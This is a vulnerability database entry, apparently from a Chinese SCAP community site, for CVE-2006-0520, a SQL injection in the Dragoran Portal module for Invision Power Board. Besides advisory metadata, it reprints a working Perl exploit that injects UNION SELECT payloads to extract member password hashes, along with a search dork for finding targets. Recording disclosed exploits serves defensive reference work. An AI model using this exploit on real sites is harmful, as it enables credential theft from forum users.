CVE-2006-0520
CVSS7.5
发布时间 :2006-02-02 06:02:00
修订时间 :2011-03-07 21:30:14
NMCOE    

[原文]SQL injection vulnerability index.php in Dragoran Portal module 1.3 for Invision Power Board (IPB) allows remote attackers to execute arbitrary SQL commands via the site parameter. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.


[CNNVD]Invision Power Board门户插件 Index.PHP SQL注入漏洞(CNNVD-200602-023)

        用于Invision Power Board (IPB)的Dragoran Portal模块1.3的index.php中存在SQL注入漏洞。远程攻击者可以借助site参数执行任意 SQL命令。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0520
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0520
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200602-023
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/24404
(UNKNOWN)  XF  portal-index-sql-injection(24404)
http://www.vupen.com/english/advisories/2006/0396
(UNKNOWN)  VUPEN  ADV-2006-0396
http://secunia.com/advisories/18664
(VENDOR_ADVISORY)  SECUNIA  18664
http://www.securityfocus.com/bid/16447
(UNKNOWN)  BID  16447
http://www.osvdb.org/22851
(UNKNOWN)  OSVDB  22851

- 漏洞信息

Invision Power Board门户插件 Index.PHP SQL注入漏洞
高危 SQL注入
2006-02-02 00:00:00 2006-02-03 00:00:00
远程  
        用于Invision Power Board (IPB)的Dragoran Portal模块1.3的index.php中存在SQL注入漏洞。远程攻击者可以借助site参数执行任意 SQL命令。

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本。

- 漏洞信息 (1461)

Invision Power Board Dragoran Portal Mod <= 1.3 SQL Injection Exploit (EDBID:1461)
php webapps
2006-01-31 Verified
0 SkOd
N/A [点击下载]
#!/usr/bin/perl
###########################################
#IPB Portal 1.3->Invision Power Board plugin
#Created By SkOd
#SED security Team , http://sed-team.be
###########################################
#google:
#"Portal 1.3 by Dragoran"
###########################################



use IO::Socket;
if (@ARGV < 3){
print q{
############################################################
#      IPB Portal 1.3 SQL injection Get Hash Exploit       #
#          Tested on Invision Power Board 1.3.0		   #
#	    created By SkOd. SED Security Team             #
############################################################
	ipbpro.pl [HOST] [PATH] [Target id]
	  ipbpro.pl www.host.com /forum/ 2 
############################################################
};
exit;
}
$serv = $ARGV[0];
$dir = $ARGV[1];
$id = $ARGV[2];


$serv =~ s/(http:\/\/)//eg;
$path = $dir.'index.php?act=portal&site=-999%20UNION%20SELECT%20substring(password,1,10),substring(password,11,20),substring(password,21,30)%20FROM%20ibf_members%20Where%20id='.$id.'/*';
$path2 = $dir.'index.php?act=portal&site=-999%20UNION%20SELECT%20substring(password,31,32),null,null%20FROM%20ibf_members%20Where%20id='.$id.'/*';
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-]Connect Failed\r\n";

print "[+]Connecting...\n";
print $socket "GET $path HTTP/1.1\n";
print $socket "Host: $serv\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "[+]Connected\n";
print "[+]User ID: $id\n";
print "[+]MD5 Hash: ";
while ($answer = <$socket>)
{
$answer =~ s/40%//eg;
$answer =~ s/30%//eg;
$answer =~ m/valign="top" width="(.*?)"/ && print "$1";
}

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-]Exploit Failed\r\n";
print $socket "GET $path2 HTTP/1.1\n";
print $socket "Host: $serv\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";

while ($answer = <$socket>)
{
$answer =~ s/40%//eg;
$answer =~ s/30%//eg;
$answer =~ m/valign="top" width="(.*?)"/ && print "$1";
}

# milw0rm.com [2006-01-31]
		

- 漏洞信息

22851
Invision Power Board Dragoran Portal Module index.php site Parameter SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public

- 漏洞描述

Invision Power Board Dragoran Portal Module contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the index.php script not properly sanitizing user-supplied input to the 'site' variable. This may allow an attacker to inject or manipulate SQL queries in the back-end database.

- 时间线

2006-02-01 Unknow
Unknow Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站